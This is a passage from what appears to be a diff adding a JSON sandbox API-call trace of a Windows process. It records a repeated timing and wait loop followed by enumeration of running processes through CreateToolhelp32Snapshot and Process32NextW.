"GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1957 + }, + { + "timestamp": "2025-03-07 22:35:02,625", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "266" + } + ], + "repeated": 0, + "id": 1958 + }, + { + "timestamp": "2025-03-07 22:35:02,907", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1959 + }, + { + "timestamp": "2025-03-07 22:35:02,907", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "228" + } + ], + "repeated": 0, + "id": 1960 + }, + { + "timestamp": "2025-03-07 22:35:03,141", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1961 + }, + { + "timestamp": "2025-03-07 22:35:03,141", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "302" + } + ], + "repeated": 0, + "id": 1962 + }, + { + "timestamp": "2025-03-07 22:35:03,454", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1963 + }, + { + "timestamp": "2025-03-07 22:35:03,454", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "295" + } + ], + "repeated": 0, + "id": 1964 + }, + { + "timestamp": "2025-03-07 22:35:03,750", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1965 + }, + { + "timestamp": "2025-03-07 22:35:03,750", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "271" + } + ], + "repeated": 0, + "id": 1966 + }, + { + "timestamp": "2025-03-07 22:35:04,032", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1967 + }, + { + "timestamp": "2025-03-07 22:35:04,032", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "233" + } + ], + "repeated": 0, + "id": 1968 + }, + { + "timestamp": "2025-03-07 22:35:04,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1969 + }, + { + "timestamp": "2025-03-07 22:35:04,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "307" + } + ], + "repeated": 0, + "id": 1970 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce36cc", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "CreateToolhelp32Snapshot", + "status": true, + "return": "0x000004ec", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002", + "pretty_value": "TH32CS_SNAPPROCESS" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1971 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32FirstW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "[System Process]" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1972 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "System" + }, + { + "name": "ProcessId", + "value": "4" + } + ], + "repeated": 0, + "id": 1973 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Registry" + }, + { + "name": "ProcessId", + "value": "92" + } + ], + "repeated": 0, + "id": 1974 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smss.exe" + }, + { + "name": "ProcessId", + "value": "328" + } + ], + "repeated": 0, + "id": 1975 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "428" + } + ], + "repeated": 0, + "id": 1976 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wininit.exe" + }, + { + "name": "ProcessId", + "value": "504" + } + ], + "repeated": 0, + "id": 1977 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "516" + } + ], + "repeated": 0, + "id": 1978 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "winlogon.exe" + }, + { + "name": "ProcessId", + "value": "600" + } + ], + "repeated": 0, + "id": 1979 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "services.exe" + }, + { + "name": "ProcessId", + "value": "640" + } + ], + "repeated": 0, + "id": 1980 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "lsass.exe" + }, + { + "name": "ProcessId", + "value": "660" + } + ], + "repeated": 0, + "id": 1981 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "752" + } + ], + "repeated": 0, + "id": 1982 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "760" + } + ], + "repeated": 0, + "id": 1983 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "768" + } + ], + "repeated": 0, + "id": 1984 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "880" + } + ], + "repeated": 0, + "id": 1985 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "932" + } + ], + "repeated": 0, + "id": 1986 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dwm.exe" + }, + { + "name": "ProcessId", + "value": "1004" + } + ], + "repeated": 0, + "id": 1987 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "520" + } + ], + "repeated": 0, + "id": 1988 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "696" + } + ], + "repeated": 0, + "id": 1989 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "844" + } + ], + "repeated": 0, + "id": 1990 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1100" + } + ], + "repeated": 0, + "id": 1991 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1120" + } + ], + "repeated": 0, + "id": 1992 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1140" + } + ], + "repeated": 0, + "id": 1993 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1152" + } + ], + "repeated": 0, + "id": 1994 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1172" + } + ], + "repeated": 0, + "id": 1995 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1224" + } + ], + "repeated": 0, + "id": 1996 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1328" + } + ], + "repeated": 0, + "id": 1997 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1392" + } + ], + "repeated": 0, + "id": 1998 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1400" + } + ], + "repeated": 0, + "id": 1999 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1492" + } + ], + "repeated": 0, + "id": 2000 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1604" + } + ], + "repeated": 0, + "id": 2001 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1612" + } + ], + "repeated": 0, + "id": 2002 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1636" + } + ], + "repeated": 0, + "id": 2003 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Memory Compression" + }, + { + "name": "ProcessId", + "value": "1700" + } + ], + "repeated": 0, + "id": 2004 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1712" + } + ], + "repeated": 0, + "id": 2005 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1736" + } + ], + "repeated": 0, + "id": 2006 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1776" + } + ], + "repeated": 0, + "id": 2007 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1784" + } + ], + "repeated": 0, + "id": 2008 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1864" + } + ], + "repeated": 0, + "id": 2009 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1940" + } + ], + "repeated": 0, + "id": 2010 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1988" + } + ], + "repeated": 0, + "id": 2011 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2020" + } + ], + "repeated": 0, + "id": 2012 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2040" + } + ], + "repeated": 0, + "id": 2013 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1044" + } + ], + "repeated": 0, + "id": 2014 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2084" + } + ], + "repeated": 0, + "id": 2015 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2132" + } + ], + "repeated": 0, + "id": 2016 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "spoolsv.exe" + }, + { + "name": "ProcessId", + "value": "2208" + } + ], + "repeated": 0, + "id": 2017 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2260" + } + ], + "repeated": 0, + "id": 2018 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2320" + } + ], + "repeated": 0, + "id": 2019 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2432" + } + ], + "repeated": 0, + "id": 2020 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2468" + } + ], + "repeated": 0, + "id": 2021 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2512" + } + ], + "repeated": 0, + "id": 2022 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2544" + } + ], + "repeated": 0, + "id": 2023 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2564" + } + ], + "repeated": 0, + "id": 2024 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2580" + } + ], + "repeated": 0, + "id": 2025 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2608" + } + ], + "repeated": 0, + "id": 2026 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2732" + } + ], + "repeated": 0, + "id": 2027 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2756" + } + ], + "repeated": 0, + "id": 2028 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2772" + } + ], + "repeated": 0, + "id": 2029 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MsMpEng.exe" + }, + { + "name": "ProcessId", + "value": "2780" + } + ], + "repeated": 0, + "id": 2030 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2892" + } + ], + "repeated": 0, + "id": 2031 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3004" + } + ], + "repeated": 0, + "id": 2032 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3216" + } + ], + "repeated": 0, + "id": 2033 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3544" + } + ], + "repeated": 0, + "id": 2034 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sihost.exe" + }, + { + "name": "ProcessId", + "value": "3724" + } + ], + "repeated": 0, + "id": 2035 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3740" + } + ], + "repeated": 0, + "id": 2036 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3768" + } + ], + "repeated": 0, + "id": 2037 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3868" + } + ], + "repeated": 0, + "id": 2038 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3928" + } + ], + "repeated": 